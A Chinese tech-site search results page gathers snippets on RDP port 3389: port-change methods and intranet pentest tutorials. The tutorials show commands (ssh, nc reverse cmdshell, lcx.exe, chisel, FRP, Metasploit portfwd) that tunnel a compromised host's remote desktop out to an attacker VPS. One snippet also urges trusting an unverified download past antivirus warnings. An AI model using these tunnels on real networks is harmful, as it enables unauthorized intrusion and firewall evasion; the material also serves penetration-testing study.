首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

3389 Windows 远程端口修改工具

安全卫士或360杀毒可能会拦截,信任后操作即可 这里分享.zip的文件 https://pan.baidu.com/s/1Rt3ZFXY0sOD5okeb9VI3_A image.png 软件运行效果如下,远程桌面端口请设置...1024-65535之间,填好你要修改的端口后,点击“修改端口”按钮,然后重启远程服务生效,重启后发现用新改的远程端口进不去,请查看安全组是否放行了新的远程端口。...image.png 重启远程服务运行services.msc找到remote desktop services 点重启按钮并点是 图片.png 图片.png 除过工具改远程端口号,还有注册表修改法...ControlSet002\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v "PortNumber" /t REG_DWORD /d 36970 /f 执行完命令后,重启远程服务...,然后在安全组放行新的远程端口

6.1K60

3389服务器远程端口修改怎么操作

今天在服务器端的攻击防护日志中看到3389端口被攻击,查一下3389是服务器远程端口,是服务器远程连接的默认端口,很多黑客都针对这个端口进行扫描,那如果修改远程连接的端口呢?...这个远程连接端口可以直接从注册表进行修改。修改两个地方。...(默认值是3389),然后修改为您想要使用的端口就可以,如43890,但是不要选择一些我们常用的端口或者您的软件需要使用的端口,否则会出现端口冲突。...43890就可以。...注意:修改完毕后,重启服务器,才会生效   服务器远程端口修改后怎么用?用户名后面加上刚刚修改具体的端口:43890,例如188.188.85.52:43890,密码不变,登录就可以

26.9K304
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    内网渗透测试:隐藏通讯隧道技术

    在攻击者vps上面执行: ssh -CfNg -L 1153(vps端口) : 192.168.52.138(目标机ip) : 3389(目标端口) root@192.168.1.103(跳板机) //...访问vps本地1153端口,就可以访问内网Windows Server 8(192.168.52.138)的3389端口: rdesktop 127.0.0.1:1153 可以看到,成功连上了内网Windows...远程转发实验 还是相似的测试环境,但此时内网中没有边界设备,所以攻击者vps不能访问内网中的这三台机器;内网web服务器可以访问外网vps,windows server 8和域控制器都不能访问外网vps...我们的思路是:通过外网vps访问内网windows server 8的3389端口。...)的3389端口上,我们访问vps的3307端口,即可访问内网windows server 8的3389端口远程桌面: 动态转发实验 前面介绍的端口转发类型都叫静态端口转发,所谓的 “静态” 是指应用程序服务器端的

    2.2K40

    SSH加密隧道之端口转发

    简介 SSH会自动加密和解密所有SSH客户端与服务端之间的网络数据,还能够将其他TCP端口的网络数据通过SSH连接进行转发,并且自动提供相应的加密及解密服务,这一过程被叫做“SSH隧道” (tunneling...7 | -L 进行本地端口转发 8 | -R 进行远程端口转发 9 | -D 动态转发,即socks代理 10 | -T 禁止分配伪终端 11 | -p 指定远程ssh服务端口 本地转发 把本地端口数据转发到远程服务器...简单说 就是通过☁️VPS这台机器把本地攻击机的33389端口转到了☁️目标服务器的3389端口上,也就是说这个ssh 隧道是建立在本地攻击机与☁️VPS之间的。...远程转发 把远程端口数据转发到本地服务器,本地服务器作为SSH客户端及应用服务端,称为反向tcp端口加密转发。...远程连接☁️VPS3389端口,成功连接进入目标服务器(不出网)的远程桌面中。 ?

    3.8K20

    CentOS 7部署FRP服务,实现内网穿透

    如果您自己有VPS也可以轻松搭建FRP,此处分享的是一个来自Github上的开源项目,这篇文章以CentOS 7 X64为例。...安装FRP Server 作者已经提供编译好的二进制包,下载解压 - 然后修改配置文件即可。...auth_token = 123456 bind_port: 主服务需要监听的端口,这里使用7000 listen_port : 需要转发的端口,这里使用3389 auth_token: 相当于验证密码.../frps.ini 启动服务端,当然也别忘记在防火墙放行端口哦。如果需要服务在后台运行,可以将命令替换为:nohup ./frps -c ....IP local_port: 本地电脑监听的端口(Windows远程桌面服务默认监听3389) remote_port: Server端需要转发的端口 auth_token: 验证密码,上个步骤我们设置的

    5.7K10

    云服务器远程桌面登录蓝屏怎么办?

    这时候不要慌,不要急着联系售后重启服务器,因为此时除了远程连接不可用,其他一切应用是不受影响的,网站依旧可以打开,FTP依旧可以上传下载,不属于紧急故障。   重启会中断服务器运行,产生不良影响。...那么要怎么办呢?   解决办法1:   远程桌面连接-》选项-》高级-》去掉“主题”和“位图缓存”这两个选项,然后登陆服务器   解決的方法2:   一个用户黑屏后,使用另外一个管理员用户登陆。...解决办法3:   用增强的3389远程桌面登陆器登录试一试,能正常登录就重启服务器或vps。   ...解决办法4:   超出最大连接数(同样可以处理远程黑屏和蓝屏问题):   在本地电脑运行命令行:   mstsc /console /v:你的服务器IP:远程端口   如果以上办法不能解决,不是急着登录服务器的话...,可以一直耗着,毕竟服务器是正常运行的,是在需要登录,就只能联系售后技术重启服务器

    19K20

    内网渗透测试研究:隐藏通讯隧道技术

    如果远程主机开启相应的端口,且内网可连接外网的话,就会输出相应的端口信息。 3. CIMP 协议 用“ping”命令,执行 ping 。 4....在一些网络环境中,如果攻击者使用各类上层隧道(例如HTTP隧道、DNS隧道、常规端口转发等)进行的操作都失败,由于防火墙不会屏蔽ping数据包,所以常常会通过ping命令访问远程主机,尝试建立ICMP...最后在攻击者vps上面访问其本地1080端口即可与数据库服务器的3389端口建立连接: ?...内网端口转发 在受害机(Windows)上面执行如下命令,将受害机3389端口的数据转发到攻击者公网VPS(Windows)的8000端口上。...此时即可登录用远程桌面登录:4444,即可访问受害者的3389端口远程桌面。 ? Linux系统上面使用portmap: 先在具有公网ip的攻击机上执行: .

    2K60

    内网渗透-代理篇

    绑定服务器的cmdshell并反向连接到vps(192.168.1.4)的TCP端口vps开启监听 nc -lp 5555 ②服务器内网链接vps 5555端口,主动交出自己的cmdshell nc...程序分为两部分,admin(控制端)和agent(代理端节点),admin和agent所有选项用途均一致: -l 指定本地socks端口,等待远程连接 -c 指定远程socks机器ip -p 指定远程...通过配置已经将内网的3389端口转发到vps的7001端口。此时远程连接vps的7001即可远程连接内网的3389主机: ?...通与不通就缺一个socks代理,我太爱proxychains ? ---- 三、MSF穿越多级网络 ?...爆破成功后,将远程目标机的端口转发到本地攻击 ①.端口转发 portfwd add -L 192.168.1.5 -l 33890 -r 192.168.75.131 -p 3389 ②.远程连接 rdesktop

    4.8K31

    内网渗透 | 内网穿透工具FRP的使用

    内网穿透工具FRP的使用 目录 FRP 使用FRP建立隧道 服务端 客户端 使用FRP映射Web服务 服务端 客户端 使用FRP映射3389端口 服务端 客户端 FRP FRP(Fast Reverse...说明隧道搭建完成 然后访问http://100.20.14.14 就是相当于访问位于内网的主机 http://192.168.10.10 使用FRP映射3389端口 现在有这么一个场景,我们获得了位于内网的一台主机的权限...,并且知道他的登录用户名和密码。...他的3389端口只对内网开放,现在我们需要将该主机的3389端口映射到公网我们的VPS3389端口,那样,我们连接我们VPS3389端口就相当于连接内网主机的3389端口 服务端 位于公网的VPS...说明隧道搭建完成 远程连接100.20.14.14的3389端口即可。

    2.3K10

    内网渗透|Chisel内网穿透工具

    说明:可以使用第一条命令,也可以使用第二条命令,其实第二条命令和第一条命令效果一样,只是省略0.0.0.0,chisel的客户端默认使用的就是0.0.0.0这个IP。 ?...0x02 chisel进行远程桌面代理 首先需要两台windows主机和一台VPS,在这里使用VPS作为chisel服务器端,然后使用win7作为内网主机,使用win10作为我们的攻击者主机。...chisel客户端(win7的IP为192.168.223.151) chisel.exe client -v VPS:6666 R:0.0.0.0:33389:192.168.223.151:3389...(2):第二步:将win7的3389端口转发到VPS的33389端口 其实上一步已经完成了这一步操作,现在看一下chisel服务端和客户端的连接情况。 服务端 ? 客户端 ?...(3):第三步:使用攻击者主机连接win7的3389 ? 成功登录远程桌面。

    9.4K21

    端口转发----lcx.exe

    什么情况下需要端口转发: Web服务器在内网中,远程桌面无法连接,因此需要进行端口转发。...内网IP的80端口通过端口映射到外网IP的80端口上, 内网的WEB服务器通过外网IP反向代理,这个情况下需要进行端口转发 服务器处于外网,可以访问外部网络,但是服务器安装了防火墙来拒绝敏感端口的连接...无外网IP           我们有一个外网IP:10.22.124.132 在目标机器上执行lcx.exe -slave 10.22.124.132 6666 127.0.0.1 3389...意思是把目标机器的 3389端口与公网服务器的 6666端口绑定。...我们直接访问本机的9999端口,通过vps端口转发,相当于访问的是目标主机的3389端口。 此时已经成功登陆进来,我们查看IP,可以看到是目标机器。

    2.1K90
    领券